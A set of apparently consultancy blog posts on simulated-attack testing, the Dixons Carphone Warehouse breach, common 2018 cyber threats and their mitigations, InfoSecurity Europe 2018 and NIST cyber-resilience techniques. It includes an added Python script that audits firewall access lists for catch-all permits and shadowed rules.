For sure, both vulnerability assessments and penetration tests have proven to be valuable tools in the arsenal for protecting IT systems from compromise, but only when used effectively and frequently enough.

 

One challenge however that either approach may find very difficult to keep up with is the rate of change as newer, more sophisticated and persistent threats and exploits appear on an almost daily basis. 

 

An emerging approach to confront the threats head on while enabling organisations to take the initiative is to deploy a solution that conducts a series of simulated attacks based on known and emerging threat vectors. With this type of approach, you can now address the question “how do you know your security systems are working?”.  

How many times have you seen a detailed and impressive set of access control lists, only to be undone by the second-to-last line, “permit ip any any”? Because the first matching entry wins, a catch-all permit near the end quietly turns the list's default from deny to allow and makes every rule after it unreachable.
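As an added check (not code from the original post), the following Python script parses a constructed Cisco-style extended ACL and reports a catch-all “permit ip any any” together with any later rules it shadows, which is exactly how a long list of specific entries gets undone. The sample ACL text and the restriction to bare permit/deny entries are assumptions of the example.

```python
# Added example (not from the original post): audit a Cisco-style extended ACL
# for catch-all permits and rules shadowed by an earlier, broader rule. Entries
# understood: <permit|deny> <proto> <src> <dst> [port options], where <src>/<dst>
# is 'any', 'host A.B.C.D' or 'A.B.C.D WILDCARD'.
import ipaddress
from dataclasses import dataclass

ANY = ipaddress.IPv4Network("0.0.0.0/0")
# Constructed sample: the "permit ip any any" in the second-to-last line makes
# the explicit final deny unreachable and flips the default from deny to allow.
WEAK_ACL = """\
permit tcp 10.1.0.0 0.0.255.255 host 192.0.2.10 eq 443
permit udp host 10.1.2.3 host 192.0.2.53 eq 53
deny ip 10.1.0.0 0.0.255.255 any
permit ip any any
deny ip any any
"""
# Same policy with the catch-all permit removed: every rule is reachable.
HARDENED_ACL = WEAK_ACL.replace("permit ip any any\n", "")


@dataclass(frozen=True)
class AclEntry:
    line_no: int
    action: str       # 'permit' or 'deny'
    proto: str        # 'ip', 'tcp', 'udp', ...
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network

    def covers(self, other):
        # True if every packet matched by `other` is also matched by self.
        proto_ok = self.proto == "ip" or self.proto == other.proto
        return (proto_ok and other.src.subnet_of(self.src)
                and other.dst.subnet_of(self.dst))

    def is_catch_all_permit(self):
        return (self.action == "permit" and self.proto == "ip"
                and self.src == ANY and self.dst == ANY)


def _wildcard_to_network(addr, wildcard):
    """Convert 'A.B.C.D WILDCARD' (Cisco inverse mask) into an IPv4Network."""
    netmask = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    prefix = bin(netmask).count("1")
    if netmask != (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF:
        raise ValueError(f"non-contiguous wildcard mask {wildcard}")
    return ipaddress.IPv4Network(f"{addr}/{prefix}", strict=False)


def _take_address(tokens, i):
    # Parse one address spec at tokens[i]; return (network, next index).
    if tokens[i] == "any":
        return ANY, i + 1
    if tokens[i] == "host":
        return ipaddress.IPv4Network(tokens[i + 1] + "/32"), i + 2
    return _wildcard_to_network(tokens[i], tokens[i + 1]), i + 2


def parse_acl(text):
    """Turn ACL text into AclEntry objects; non-rule lines are skipped."""
    entries = []
    for line_no, raw in enumerate(text.strip().splitlines(), start=1):
        tokens = raw.split()
        if tokens and tokens[0] in ("permit", "deny"):
            src, i = _take_address(tokens, 2)
            dst, _ = _take_address(tokens, i)
            entries.append(AclEntry(line_no, tokens[0], tokens[1], src, dst))
    return entries


def audit_acl(text):
    """Report catch-all permits and rules shadowed by an earlier broader rule."""
    entries = parse_acl(text)
    findings = {"catch_all_permit": [], "shadowed": []}
    for j, rule in enumerate(entries):
        if rule.is_catch_all_permit():
            findings["catch_all_permit"].append(rule.line_no)
        for earlier in entries[:j]:
            if earlier.covers(rule):  # first match wins: `rule` is dead code
                findings["shadowed"].append((rule.line_no, earlier.line_no))
                break
    return findings
```

Running `audit_acl(WEAK_ACL)` flags line 4 as the catch-all permit and line 5 as shadowed by it, while the hardened list produces no findings.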

 

Without comprehensive and persistent testing, any assurance of cyber security is based purely on assumption and best guess.  

Yes, you have defences in place such as firewalls, endpoint security and anti-malware solutions, but how do you know that they are really effective against known and unknown cyber threats? The assumption is that you have the right defences in place to protect against vulnerabilities and that the security solutions are optimally configured. You only truly know for certain when a breach has been attempted, detected and blocked. On the other hand, you may have been hacked and you either never know, or you don't find out for months after the event, when the hackers have stolen data and moved on to other victims.


 

A simulated attack is a method of safely checking whether your systems are secure and your data is protected from vulnerabilities. The simulation can run a range of attack vectors to test your defences against a range of vulnerabilities. Simulated attacks that succeed give you a clear understanding of your current vulnerabilities and how to mitigate them – actionable intelligence on the holes in your cyber defences. It can also validate the security controls that are in place and be used to test your security incident response procedures. Remember that cyber defence is not just about preventing attacks; it is also about what you do when attacks occur to remediate and recover.

 

A simulated attack service can also be used to undertake real-time validation, especially when changes are made or as you become aware of new vulnerabilities. When run as a cloud service, it can be run repeatedly to provide ongoing security posture assurance. A simulated attack service is definitely worth considering to augment a comprehensive security posture assessment approach that includes penetration testing and vulnerability assessment. Simulated attacks can be seen as an emerging solution that is geared to match the rapid and changing nature of cyber threats.

 


5 Takeaways from the Carphone Warehouse Breach

The Carphone Warehouse breach is the biggest so far announced in the post-GDPR era.

What are the salient points to note from this breach? 

  1. 6 million records accessed 
  2. NCSC, ICO, FCA investigating 
  3. 3 million records accessed in 2015 breach 
  4. Cyber security risk identified by board in last FY report 
  5. If GDPR applies, maximum fine of £420m could apply 

 

A recently announced massive cyber attack at Dixons Carphone Warehouse has resulted in significant unauthorised access to millions of records including personal data. It appears that two breaches occurred, which resulted in:

 

  • 6 million customer records being stolen including 5.9 million payment card details  
  • 1.2 million customer records including name, address, email 

 

In January Carphone Warehouse were fined £400,000 for a breach that occurred in 2015 when 3m customer records (including personal details) and 1,000 employee records were stolen. 

 

Dixons say the breach was only discovered in the week leading up to the announcement, and that it actually occurred in July 2017. Under the Data Protection Act they would be liable to a maximum fine of £500,000. Under the new GDPR regulation the fine could rise to a maximum of £420m, based on last year's global turnover of £10.5bn.

 

In their most recent report, Dixons identified information security as a risk, along with their potential vulnerability to malware and cyber attacks. They identified potential consequences that could include reputational damage, reduced cash flow, financial penalties, reduced revenue and profitability, and loss of competitive advantage. Dixons did appear, however, to be heading in the right direction to manage the risk, ensuring senior management oversight including a Strategic Improvement Plan and increased investment targeted at managing the information/cyber security risk.

 

The independent regulator the ICO is investigating the current breach along with the FCA and NCSC. The ICO has said it is yet to determine whether GDPR or the 1998 Data Protection regulations will apply. 

 

The NCSC is working on how the breach has impacted UK citizens and what measures can be taken to prevent such a breach re-occurring. They have also published guidance on what to do for people who think they have been affected by the breach. 

 

The CEO Alex Baldock has apologised saying that they have fallen short of expected standards. He confirmed that they have called in cyber experts to investigate as well as relevant authorities and the unauthorised access has now been blocked. 

 

Anyone affected or concerned about their personal data being accessed and how it could be used should contact Action Fraud. 

 

The breach came to light as a result of a massive attempt to compromise the cards in a card processing system; in other words, someone tried to use the card details to take unauthorised payments.

 

Dixons shares fell 6% following the announcement of the breach. 

 

Useful Resources

GDPR Readiness Test [Checklist]
GDPR 12 Step to take NOW [Infographic] 
9 Steps to Implement a Security Management Tool [eBook]

 

 

5 Cyber Security Threats Businesses are Facing in 2018

We all know the cyber security threat landscape is rapidly evolving and it is a real struggle to keep pace with the threats, much less get ahead of them, which ideally is where we should be.
Organisations, especially small to medium sized ones, have limited resources in terms of people, money and time to commit to all the areas they need to focus on.
It is therefore vital that their approach to cyber security is focused on the areas that will have the greatest impact in terms of threat prevention. Let's discuss the most common cyber threats that organisations are likely to face, which should help to determine the main areas where protection efforts need to be focused. These threats are:
  • Socially Engineered Malware
  • Password Phishing
  • Unpatched Software
  • Social Media Threats
  • Advanced Persistent Threats

Socially engineered malware

Every year, hundreds of millions of successful attacks are conducted by socially engineered malware programs. A typical form of this is data-encrypting ransomware, which arrives either in email attachments or as trojan horse software downloaded from a site hosting malware. The unsuspecting user is enticed into clicking a link or opening a document which then installs the malware; oftentimes the user is prompted to bypass the security controls that are in place for this particular type of exploit. Once installed on the host machine, the malware can disable defences such as anti-virus and call back to command and control servers, which then leads on to the exploits. Exploits could include data gathering and exfiltration, encryption of data, and horizontal propagation of the malware.
This type of threat sometimes requires the use of elevated privileges. Techniques that could be used to help prevent this type of threat include:
  • avoiding the use of elevated privileges for daily tasks
  • constantly educating users about these types of threat
  • deploying advanced endpoint protection
  • not relying solely on traditional anti-virus

Password phishing

Phishing has become a huge industry for cyber scammers, and it is estimated that approximately 80% of global email is spam. The anti-spam techniques deployed by email providers are getting better at blocking spam; however, the attackers are constantly refining their approach and inevitably some still gets through to users' inboxes. Most of us are so busy that we do not bother to hover over links to check for a valid URL, and sometimes they are so well crafted that it is easy to miss.
The best protection against phishing, apart from good anti-spam software, is user education along with policies that encourage the use of two-factor authentication such as smartcards, SMS messages, etc.

Unpatched software

Unpatched software is a major threat because it carries known vulnerabilities that would be closed if the latest available patch were applied. While this problem is common for client applications such as web browsers and ancillary software such as Adobe and Java, it is also quite common on server systems. I am sure you have seen many instances where critical servers running core business systems are unpatched and carry literally hundreds of vulnerabilities.
Software patching needs to be part of the IT operations processes and undertaken in a regular and systematic manner to avert an easily avoidable vulnerability.

Social media threats

Social media is pervasive and an essential part of an organisation's digital presence. It has therefore become a target for cyber attackers looking to find exploits and cause reputational damage or extort money from unsuspecting users and owners. The threats could start off as simply as a friend request or application install which then develops into something completely different. One example is a response to a post where a visitor voices dissatisfaction with a service. The response offers to provide assistance and redirects the person to a fake site where their username and password are requested and then used on the real social media site.
Yet again, user education is a must to help protect against this type of threat, and two-factor authentication could also prevent compromise of usernames and passwords.

Advanced Persistent Threats

The majority of large organisations have been the subject of advanced persistent threats, but that is not to say that small to medium organisations are not affected by this as well. The attacker may initially use phishing or trojans to infect one machine, but once they get hold of a machine they extend their reach throughout the organisation and steal data within hours, oftentimes remaining undetected for months.
The best way to combat advanced persistent threats is to deploy next-generation detection and protection capabilities. Typically such measures profile the normal network traffic and behaviour, creating a baseline against which anomalous behaviour can be identified and alerted on.
You may have noticed an underlying theme: the best way to mitigate most of these threats involves user awareness. The benefits of this cannot be overstated, and there are some low cost, good user training subscriptions that could save organisations a ton of money in the costs associated with a successful cyber attack.
It is also, however, very important to do the basics well, such as patching, endpoint protection, password policy and network security.

Is Cyber Security still a Maze?

InfoSecurity Europe 2018
I attended Infosec2018 this week at London Olympia. It was a vibrant event as you can imagine with every exhibitor enthusiastic to promote their wares. They were also eager to grab your details with their ‘GDPR compliant’ badge scanner. As a technologist of too many years to mention (I started in IT when 5-inch floppy discs were the rage), what really dawned on me is that it is understandable why many small businesses are not fully engaging in a comprehensive cyber security strategy.
There are many vendors with absolutely great solutions targeted at fixing some particular problems or protecting a specific area of potential exposure. And of course, there were many GDPR compliant or GDPR enabling solutions on view. The information security landscape is increasingly becoming more challenging as technology becomes more pervasive, as the cyber attack surface increases and as the sophistication and scale of attacks also increases to match.
Cyber Security really needs to be demystified to a large extent to make it more accessible to organisations. What would have really been a helpful approach from vendors would be a means of sharing a common language of Cyber Security: a means of easily identifying where each vendor's solution sits in the Cyber Security stack and what it talks to vertically and horizontally.
This would be akin to placing their offering in a Cyber Security jigsaw puzzle so that organisations can clearly see where it sits, what problems it solves and importantly what problem it doesn’t solve. Such an approach would make it easier for decision makers to engage and fully commit to adopting and implementing a comprehensive strategy for effective Cyber Security.
It has been an ongoing bugbear of mine that businesses don't easily have a conversation about their security needs. There are some obvious reasons for this such as lack of resource, lack of understanding or no buy-in at senior management level. There is also a tendency to not want to do anything because “we've been OK so far despite all the doom and gloom”.
This was reinforced in a very enlightening conversation I had with the team at the National Cyber Security Centre (the public face of GCHQ). They strongly advocated that cyber security ownership now has to be at CxO level of organisations. It will only be taken seriously, and the right strategy and resources effected when CxOs understand the business imperative of getting this right and the consequences of not doing what needs to be done.
He lamented the fact that too many organisations are sitting back and waiting until it’s too late before they do something.
He also advised, rightly so, that it was not actually so difficult to achieve a respectable level of Cyber Security. The NCSC have published guidelines on this in terms of 10 Steps to achieve Cyber Security, and this really is very straightforward, practical, actionable guidance.
I must say of all the people I spoke to during the day at Infosecurity, he was the most impassioned and engaged individual (long live our public services).
On a final note, one of my reasons for going to InfoSec was to research products that I think are unique and can fulfil customer needs. I actually met a supplier that has been named Cool Vendor by Gartner. Being my usual cheeky self I said “you guys don't look cool”; however, after spending some time understanding what the product is able to do to expose Cyber Security gaps, I am convinced that every organisation connected to the Internet needs such a service. Literally within seconds of clicking a button you can test for a range of exposures and vulnerabilities. Lack of visibility is a challenge we all face when it comes to digital communication, but it is actually ‘cool’ if you can see your exposures and do something about them before it's too late. We are in the process of signing up with this cool vendor and will bring you news about the service in the near future.

Cyber Resilience | The Framework you Should Follow

Have you sometimes found yourself bewildered by the sheer volume of bad news out there, especially about emerging cyber threats and actual attacks? It is not uncommon to wonder when you will come under a similar threat, or worse still whether it is happening already and you just haven't detected it yet. What would give us more comfort is knowing that we are cyber resilient to threats to a large extent; sure, nothing is ever 100% guaranteed, but it would be good to have a high level of confidence in our ability to survive such an eventuality.

So what would good cyber resiliency actually look like?

Cyber resiliency is really about keeping the business operational despite an attack or incident. It is about the organisation having the systems, processes and controls in place to detect an attack, contain it, recover or maintain operations despite the attack and clean up the affected systems.
Some specific objectives of cyber resilience would include the following.
  • Prevention – apply basic cyber protection mechanisms as well as more advanced cyber security controls to reduce the risk. In addition, threat intelligence is applied to keep the protection relevant
  • Cyber response preparation – create and maintain cyber incident scenarios to train staff and maintain a good level of readiness. If an incident happens, there is a plan and people know what to do
  • Minimise service degradation – in the event of an attack
  • Identify potential damage – and change resources to limit further damage
  • Maintain trust relationships – and review the trust of restored systems
  • Effective controls – understand the effectiveness of cyber security controls in relation to the nature of the adversaries
  • Review systems architecture – and restructure to reduce risks
NIST has published some recommendations that could help with achieving cyber resilience, and some of these are outlined below.
A word of caution: this is not for the faint hearted, as it reads as if from a military manual.
Adaptive Response – maximise the ability to respond in a timely and appropriate manner to adverse conditions, thus limiting business impact and maintaining operations.
Analysis and Monitoring – maximise the ability to detect attacks by extensive monitoring that can reveal the extent and scope of an attack. We have seen how AI and Machine Learning are playing an increasing role in this area.
Coordinated Protection – implement a range of protection measures that follow defence-in-depth principles, thus ensuring that attacks will need to overcome multiple mechanisms in order to be successful.
Deception – conceal critical equipment or resources from the attacker; this could include techniques such as encryption or a multi-layered firewall approach.
Diversity – limit the likelihood of successful attacks on common replicated systems, forcing attackers to breach different systems and necessitating multiple variants of malware.
Dynamic Positioning – distribute and dynamically relocate system resources. This could easily be achieved in a resilient cloud environment and could go a long way to supporting recovery and continuity, as well as making it more difficult for attackers to determine the infrastructure topology.
Non-Persistence – generate and create resources as needed, avoiding the likelihood of intrusions through backdoors left on unused resources.
Privilege Restriction – restrict access privileges based on attributes of users and systems as well as environmental considerations, for example not granting admin rights to a user connected via an Internet café or from a country you have no business with.
Redundancy – provide multiple instances of critical business systems to aid recovery from failure of primary systems.
Segmentation – define and separate elements of your systems based on their criticality and assign permissions accordingly. This will help to prevent the spread of malware and give further protection to critical systems.
Unpredictability – make random and unpredictable changes to increase uncertainty for attackers, making it more difficult for them to determine their attack sequence.
These techniques put together will go a long way to achieving a high degree of cyber resiliency, which will result in the ability to manage the cyber risk and maintain operational services, especially in times of persistent attack.